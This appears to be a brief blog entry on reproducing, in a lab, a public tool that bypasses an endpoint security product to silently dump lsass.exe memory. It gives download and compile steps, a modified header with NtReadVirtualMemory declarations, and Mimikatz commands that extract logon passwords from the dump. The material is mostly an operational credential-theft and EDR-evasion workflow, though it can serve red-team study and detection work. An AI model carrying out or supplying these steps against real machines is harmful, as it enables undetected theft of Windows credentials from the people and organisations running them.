Ultra short entry here. When reading a very interesting article on bypassing one End Point Security product to silently dump lsass.exe without getting detected https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
One will want to reproduce the steps of course and since the code is available here :
https://github.com/hoangprod/AndrewSpecial/tree/master
I have just done that in my lab.
Below might save some seconds if one gets stuck compiling it. (I have used Visual Studio 2013 on Win7 SP1 64bit to build it)
# On Windows build server just download the master.zip https://github.com/hoangprod/AndrewSpecial/archive/master.zip
Modify AndrewSpecial.h to include the additional #pragma comment (lib, “advapi32.lib”)
#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>
#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")
void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);
enum supported_versions
{
win8 = 0x060200,
win81 = 0x060300,
win10 = 0x0A0000,
};
Open up the 64bit VS2013 x64 Native Tools Command Prompt and cd to the source directory
cl *.cpp /DUNICODE
Next we transfer the compiled Andrew.exe binary to our testing lab Windows 10 box and execute it
The resulting Andrew.dmp can be fed to a separate instance of Mimikatz on some other machine as follows
mimikatz # sekurlsa::minidump Andrew.dmp mimikatz # sekurlsa::logonPasswords
Courtesy of CaledoniaProject
https://github.com/hoangprod/AndrewSpecial/pull/1/commits/0320bf38ad02aa8b000b8095be35242b826d0f64